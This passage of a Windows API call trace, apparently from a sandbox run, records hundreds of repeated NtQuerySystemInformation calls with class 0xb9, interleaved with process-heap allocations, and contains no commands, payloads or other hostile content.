(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] GetProcessHeap () returned 0x269489b0000 [0233.651] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949596b80 [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] GetProcessHeap () returned 0x269489b0000 [0233.655] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x269495955a0 [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] GetProcessHeap () returned 0x269489b0000 [0233.658] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2c) returned 0x26948a54850 [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.660] GetProcessHeap () returned 0x269489b0000 [0233.660] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x269495969c0 [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] GetProcessHeap () returned 0x269489b0000 [0233.663] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x5a) returned 0x26949596410 [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] GetProcessHeap () returned 0x269489b0000 [0233.686] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2c) returned 0x26948a547d0 [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] GetProcessHeap () returned 0x269489b0000 [0233.689] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2c) returned 0x26948a54c10 [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc48, Length=0x30, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda00, Length=0x20, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x20, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x20, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.691] GetProcessHeap () returned 0x269489b0000 [0233.691] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x2c) returned 0x26948a54cd0 [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x20, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb78, Length=0x30, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.693] 